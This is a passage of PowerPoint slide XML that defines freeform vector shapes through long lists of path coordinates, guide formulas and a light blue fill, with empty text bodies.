                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="182"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36389" name="Freeform 121"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3629" y="2131"/>
                <a:ext cx="272" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 173 w 272"/>
                  <a:gd name="T1" fmla="*/ 176 h 182"/>
                  <a:gd name="T2" fmla="*/ 168 w 272"/>
                  <a:gd name="T3" fmla="*/ 165 h 182"/>
                  <a:gd name="T4" fmla="*/ 162 w 272"/>
                  <a:gd name="T5" fmla="*/ 157 h 182"/>
                  <a:gd name="T6" fmla="*/ 144 w 272"/>
                  <a:gd name="T7" fmla="*/ 149 h 182"/>
                  <a:gd name="T8" fmla="*/ 123 w 272"/>
                  <a:gd name="T9" fmla="*/ 137 h 182"/>
                  <a:gd name="T10" fmla="*/ 102 w 272"/>
                  <a:gd name="T11" fmla="*/ 116 h 182"/>
                  <a:gd name="T12" fmla="*/ 95 w 272"/>
                  <a:gd name="T13" fmla="*/ 99 h 182"/>
                  <a:gd name="T14" fmla="*/ 83 w 272"/>
                  <a:gd name="T15" fmla="*/ 95 h 182"/>
                  <a:gd name="T16" fmla="*/ 70 w 272"/>
                  <a:gd name="T17" fmla="*/ 94 h 182"/>
                  <a:gd name="T18" fmla="*/ 65 w 272"/>
                  <a:gd name="T19" fmla="*/ 85 h 182"/>
                  <a:gd name="T20" fmla="*/ 64 w 272"/>
                  <a:gd name="T21" fmla="*/ 76 h 182"/>
                  <a:gd name="T22" fmla="*/ 53 w 272"/>
                  <a:gd name="T23" fmla="*/ 70 h 182"/>
                  <a:gd name="T24" fmla="*/ 41 w 272"/>
                  <a:gd name="T25" fmla="*/ 62 h 182"/>
                  <a:gd name="T26" fmla="*/ 39 w 272"/>
                  <a:gd name="T27" fmla="*/ 71 h 182"/>
                  <a:gd name="T28" fmla="*/ 30 w 272"/>
                  <a:gd name="T29" fmla="*/ 73 h 182"/>
                  <a:gd name="T30" fmla="*/ 17 w 272"/>
                  <a:gd name="T31" fmla="*/ 80 h 182"/>
                  <a:gd name="T32" fmla="*/ 8 w 272"/>
                  <a:gd name="T33" fmla="*/ 93 h 182"/>
                  <a:gd name="T34" fmla="*/ 82 w 272"/>
                  <a:gd name="T35" fmla="*/ 30 h 182"/>
                  <a:gd name="T36" fmla="*/ 142 w 272"/>
                  <a:gd name="T37" fmla="*/ 41 h 182"/>
                  <a:gd name="T38" fmla="*/ 161 w 272"/>
                  <a:gd name="T39" fmla="*/ 57 h 182"/>
                  <a:gd name="T40" fmla="*/ 167 w 272"/>
                  <a:gd name="T41" fmla="*/ 78 h 182"/>
                  <a:gd name="T42" fmla="*/ 179 w 272"/>
                  <a:gd name="T43" fmla="*/ 96 h 182"/>
                  <a:gd name="T44" fmla="*/ 193 w 272"/>
                  <a:gd name="T45" fmla="*/ 101 h 182"/>
                  <a:gd name="T46" fmla="*/ 201 w 272"/>
                  <a:gd name="T47" fmla="*/ 105 h 182"/>
                  <a:gd name="T48" fmla="*/ 208 w 272"/>
                  <a:gd name="T49" fmla="*/ 91 h 182"/>
                  <a:gd name="T50" fmla="*/ 226 w 272"/>
                  <a:gd name="T51" fmla="*/ 79 h 182"/>
                  <a:gd name="T52" fmla="*/ 235 w 272"/>
                  <a:gd name="T53" fmla="*/ 73 h 182"/>
                  <a:gd name="T54" fmla="*/ 240 w 272"/>
                  <a:gd name="T55" fmla="*/ 76 h 182"/>
                  <a:gd name="T56" fmla="*/ 233 w 272"/>
                  <a:gd name="T57" fmla="*/ 80 h 182"/>
                  <a:gd name="T58" fmla="*/ 225 w 272"/>
                  <a:gd name="T59" fmla="*/ 87 h 182"/>
                  <a:gd name="T60" fmla="*/ 230 w 272"/>
                  <a:gd name="T61" fmla="*/ 91 h 182"/>
                  <a:gd name="T62" fmla="*/ 238 w 272"/>
                  <a:gd name="T63" fmla="*/ 96 h 182"/>
                  <a:gd name="T64" fmla="*/ 247 w 272"/>
                  <a:gd name="T65" fmla="*/ 93 h 182"/>
                  <a:gd name="T66" fmla="*/ 251 w 272"/>
                  <a:gd name="T67" fmla="*/ 91 h 182"/>
                  <a:gd name="T68" fmla="*/ 257 w 272"/>
                  <a:gd name="T69" fmla="*/ 95 h 182"/>
                  <a:gd name="T70" fmla="*/ 262 w 272"/>
                  <a:gd name="T71" fmla="*/ 100 h 182"/>
                  <a:gd name="T72" fmla="*/ 272 w 272"/>
                  <a:gd name="T73" fmla="*/ 104 h 182"/>
                  <a:gd name="T74" fmla="*/ 262 w 272"/>
                  <a:gd name="T75" fmla="*/ 108 h 182"/>
                  <a:gd name="T76" fmla="*/ 258 w 272"/>
                  <a:gd name="T77" fmla="*/ 111 h 182"/>
                  <a:gd name="T78" fmla="*/ 251 w 272"/>
                  <a:gd name="T79" fmla="*/ 115 h 182"/>
                  <a:gd name="T80" fmla="*/ 244 w 272"/>
                  <a:gd name="T81" fmla="*/ 114 h 182"/>
                  <a:gd name="T82" fmla="*/ 238 w 272"/>
                  <a:gd name="T83" fmla="*/ 115 h 182"/>
                  <a:gd name="T84" fmla="*/ 229 w 272"/>
                  <a:gd name="T85" fmla="*/ 112 h 182"/>
                  <a:gd name="T86" fmla="*/ 234 w 272"/>
                  <a:gd name="T87" fmla="*/ 104 h 182"/>
                  <a:gd name="T88" fmla="*/ 225 w 272"/>
                  <a:gd name="T89" fmla="*/ 104 h 182"/>
                  <a:gd name="T90" fmla="*/ 215 w 272"/>
                  <a:gd name="T91" fmla="*/ 103 h 182"/>
                  <a:gd name="T92" fmla="*/ 212 w 272"/>
                  <a:gd name="T93" fmla="*/ 111 h 182"/>
                  <a:gd name="T94" fmla="*/ 204 w 272"/>
                  <a:gd name="T95" fmla="*/ 116 h 182"/>
                  <a:gd name="T96" fmla="*/ 207 w 272"/>
                  <a:gd name="T97" fmla="*/ 118 h 182"/>
                  <a:gd name="T98" fmla="*/ 202 w 272"/>
                  <a:gd name="T99" fmla="*/ 123 h 182"/>
                  <a:gd name="T100" fmla="*/ 190 w 272"/>
                  <a:gd name="T101" fmla="*/ 129 h 182"/>
                  <a:gd name="T102" fmla="*/ 183 w 272"/>
                  <a:gd name="T103" fmla="*/ 137 h 182"/>
                  <a:gd name="T104" fmla="*/ 192 w 272"/>
                  <a:gd name="T105" fmla="*/ 141 h 182"/>
                  <a:gd name="T106" fmla="*/ 193 w 272"/>
                  <a:gd name="T107" fmla="*/ 153 h 182"/>
                  <a:gd name="T108" fmla="*/ 192 w 272"/>
                  <a:gd name="T109" fmla="*/ 163 h 182"/>
                  <a:gd name="T110" fmla="*/ 186 w 272"/>
                  <a:gd name="T111" fmla="*/ 182 h 182"/>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272"/>
                  <a:gd name="T169" fmla="*/ 0 h 182"/>
                  <a:gd name="T170" fmla="*/ 272 w 272"/>
                  <a:gd name="T171" fmla="*/ 182 h 182"/>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272" h="182">
                    <a:moveTo>
                      <a:pt x="186" y="182"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="183" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="100"/>
                    </a:lnTo>
